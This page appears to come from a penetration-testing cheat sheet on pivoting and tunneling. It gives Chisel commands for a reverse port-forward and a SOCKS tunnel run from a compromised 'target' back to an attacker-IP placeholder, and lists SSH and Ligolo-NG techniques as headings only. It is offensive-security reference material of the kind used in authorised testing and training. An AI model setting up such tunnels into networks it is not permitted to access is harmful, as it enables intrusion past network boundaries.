Pivot & Tunneling

Sshhhhhhhhhhhhhh

Chisel -Port To Port

https://github.com/jpillora/chisel

#on attacker machine
chisel server -p 6969 --reverse

#on target machine
chisel.exe client <attacker-ip>:<attacker-chisel-port> R:<port-to-forward>:127.0.0.1:<port-to-forward>/tcp

Chisel - SOCKS

#on attacker machine
chisel server -p 6969 --reverse

#on target machine
chisel.exe client <attacker-ip>:<attacker-chisel-port> R:<port-to-forward>:127.0.0.1:socks

SSH local port forwarding

You can then browse/connect to localhost:your-port to acess victim:remote--port

SSH forward dynamic (SOCKS) proxy

Reverse SSH tunnel

One common scenario is gaining a foothold without credentials so you can't bind ssh tunnel. But you can still reverse SSH tunnel from the victim to your box. Using the following technique, you'll be able to reach those.

Reverse SSH Dynamic (SOCKS) tunnel

Ligolo-NG

https://github.com/nicocha30/ligolo-ng

A coworker of mine showed me this and I instantly fell in love with the concept. It has a proxy-agent system and it works just like a VPN using a TUN interface.

Setup TUN interface

Start proxy (agent handler)

Connect an agent to the proxy

Session management from agent

Configure port forwarding

PreviousSteganographyNextShells

Last updated

Was this helpful?